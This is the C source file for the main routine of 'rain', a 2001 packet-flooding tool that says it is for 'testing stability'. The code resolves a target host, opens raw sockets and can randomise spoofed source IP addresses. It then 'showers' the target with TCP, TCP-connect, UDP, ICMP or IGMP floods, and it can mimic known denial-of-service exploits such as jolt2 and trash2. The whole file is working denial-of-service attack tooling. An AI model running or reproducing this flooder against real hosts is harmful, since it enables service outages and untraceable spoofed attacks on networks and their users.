/*--------------------------------------------------*
 * $Header: /usr/src/Projects/rain/RCS/rain_main.c,v 1.1 2001/06/11 20:44:09 root Exp root $
 * $Author: root $
 * rain_main.c
 * rain - by Evil (mystic@tenebrous.com)
 * A flexible packet flooder for testing stability.
 * Copyright(c) 2001
 * Licensed under the GNU/GPL
 *
 * $Log: rain_main.c,v $
 * Revision 1.1  2001/06/11 20:44:09  root
 * Initial revision
 *
 * Revision 1.1  2001/06/11 02:59:26  root
 * Initial revision
 *
 *-------------------------------------------------*/

#include "rain_common.h"

void banner(void) {
  printf("[ rain %s by Evil (mystic@tenebrous.com) ] [pid:%d]\n", RAIN_VERSION, getpid());

}


int main(int argc, char **argv) {
  int raw_socket;
  struct sockaddr_in target, source;
  u_short have_target_host = FALSE;
  struct pkt_info *pkt = malloc(sizeof(struct pkt_info));
  struct pkt_info_icmp *pkticmp  = malloc(sizeof(struct pkt_info_icmp));
#if defined(RAIN_IPV6)
  struct pkt_info_icmp6 *pkticmp6 = malloc(sizeof(struct pkt_info_icmp6));
#endif
  struct pkt_info_igmp *pktigmp  = malloc(sizeof(struct pkt_info_igmp));
  struct pkt_info_tcp  *pkttcp   = malloc(sizeof(struct pkt_info_tcp));
  static unsigned char siminfo[4][16] = {
    "fawx2.c",
    "bloop.c",
    "jolt2.c",
    "trash2.c"
  };


  /* Make stdout unbuffered, so that text is displayed immediately */
  setvbuf(stdout,NULL,_IONBF,0);


  signal_init();  /* signal handling initialization */


/* set defaults for all packet types: */
  set_defaults(pkt, 
               pkttcp,
               pkticmp,
#if defined(RAIN_IPV6)
               pkticmp6,
#endif
               pktigmp);

  packets_sent = 0;

  
  /* display banner */
  banner();

  


  /* process command line arguments */
  /*---------------------------------------------------------------------------------------------------*/
  parse_command_line(argc, 
                     argv, 
                     pkt, 
                     pkttcp, 
                     pkticmp, 
    #if defined(RAIN_IPV6)
                     pkticmp6,
    #endif 
                     pktigmp, 
                     &have_target_host);
  /*---------------------------------------------------------------------------------------------------*/

  /* if no protocol was specified, we'll do that now: */
  if(pkt->type == DEFAULT) pkt->type = TCP;


  /* Die with usage if user didn't specify a target host (the only mandatory option) */
  if(have_target_host == FALSE) DieWithUsage(argv[0]);

  /* Resolve target host and set the port number */
  if(resolv(pkt->daddr, &target) < 0) DieWithError("coult not resolve target hostname");
  target.sin_port   = htons(pkt->dport);

  /* Resolve source host  */
  if(pkt->randip == 0) {
    if(resolv(pkt->saddr, &source) < 0) 
      DieWithError("could not resolve source hostname");
  } else {
    source.sin_addr.s_addr = randip();
    strcpy(pkt->saddr, inet_ntoa(source.sin_addr));
  }

  source.sin_port = htons(pkt->sport);   

  if(getuid() == 0) {
    /* Create a RAW socket */ 
    #if defined(RAIN_IPV6)
      if((raw_socket = socket(PF_INET6, SOCK_RAW, IPPROTO_RAW)) < 0)
        DieWithError("raw socket() (ipv6)");
    #else
      if((raw_socket = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
        DieWithError("raw socket()");
    #endif
  }

  printf("{\n"
         "\tA storm is coming...");
  if(pkt->simulate == 1) printf("simulating %s", siminfo[pkt->simtype]);
  printf("\n");
  printf("\t%s:%d => %s:%d ", pkt->saddr, pkt->sport, pkt->daddr, pkt->dport);

 
  /* set the start-time */
  send_start = time(NULL);

  /* send packets */
  switch(pkt->type) {
    case TCPCONNECT: {
      printf("(TCP-CONNECT)\n");
      printf("\tConnect shower active; Hit CTRL+C to quit\n");
      if(tcp_shower_connect(&target, pkt) < 0) DieWithError("error in TCP stream shower");
      raise(SIGINT);
      break;
    }
    case TCPSTREAM: {
      printf("(TCP-STREAM)\n");
      printf("\tShowering %s (%.1fk) drops; Hit CTRL+C to quit\n", int2str(pkt->num), ((float)packetsize/1024));
      if(tcp_shower_stream(&target, pkt) < 0) DieWithError("error in TCP stream shower");
      raise(SIGINT);
      break;
    }
    case TCP:{
      tcp_info_init(pkttcp);
      printf("(TCP-%s) [tos: 0x%x, frag: %s]\n", tcpinfo, pkt->tos, (pkt->frag == 1 ? hex2str(pkt->frag_off) : "N"));
      printf("\tShowering %s (%.1fk) drops; Hit CTRL+C to quit\n", int2str(pkt->num), ((float)packetsize/1024));
      if(tcp_shower(raw_socket, &source, &target, pkt, pkttcp) < 0) DieWithError("error in TCP shower");
      raise(SIGINT);
      break;
    }
    case UDP:{
      if(getuid() == 0) { /* root */
        printf("(UDP) [tos: 0x%x, frag: %s]\n", pkt->tos, (pkt->frag == 1 ? hex2str(pkt->frag_off) : "N"));
        printf("\tShowering %s (%.1fk) drops; Hit CTRL+C to quit\n", int2str(pkt->num), ((float)packetsize/1024));
        if(udp_shower(raw_socket, &source, &target, pkt) < 0) DieWithError("error in UDP shower");
        raise(SIGINT);
        break;
      } else { /* non-root */
        printf("(UDP)\n");
        printf("\tShowering %s (%.1fk) drops; Hit CTRL+C to quit\n", int2str(pkt->num), ((float)packetsize/1024));
        if(udp_shower_normal(&target, pkt) < 0) DieWithError("error in UDP shower (non-spoofed)");
        raise(SIGINT);
        break;
      }
    }
    case ICMP:{
      icmp_info_init(pkticmp); /* set ICMP info array and validate type/code */
      printf("(ICMP%s) [tos: 0x%x, frag: %s]\n", icmpinfo[pkticmp->type][pkticmp->code], 
                                                  pkt->tos,
                                                  (pkt->frag == 1 ? hex2str(pkt->frag_off) : "N"));

      printf("\tShowering %s (%.1fk) drops; Hit CTRL+C to quit\n", int2str(pkt->num), ((float)packetsize/1024));
      if(icmp_shower(raw_socket, &source, &target, pkt, pkticmp) < 0) DieWithError("error in ICMP shower");
      raise(SIGINT);
      break;
    }
    case IGMP:{
      igmp_info_init(pktigmp); /* set IGMP info array and validate type/code */
      printf("(IGMP%s) [tos: 0x%x, frag: %s, ttl: %d]\n", igmpinfo[pktigmp->type][pktigmp->code], pkt->tos,
                                          (pkt->frag == 1 ? hex2str(pkt->frag_off) : "N"), pkt->ttl);

      printf("\tShowering %s (%.1fk) drops; Hit CTRL+C to quit\n", int2str(pkt->num), ((float)packetsize/1024));
      if(igmp_shower(raw_socket, &source, &target, pkt, pktigmp) < 0) DieWithError("error in IGMP shower");
      raise(SIGINT);
      break;
    }
    default:{ DieWithError("You must specify a protocol to use"); }
  }

  freebuf(buffer); 

  return 0;
}

static const char author[]    = {"$Creator: rain by Evil (mystic@tenebrous.com) $"};
static const char copyright[] = {"$Copyright: (c) 2001 mystic@tenebrous.com $"};
/* rain_main.c */
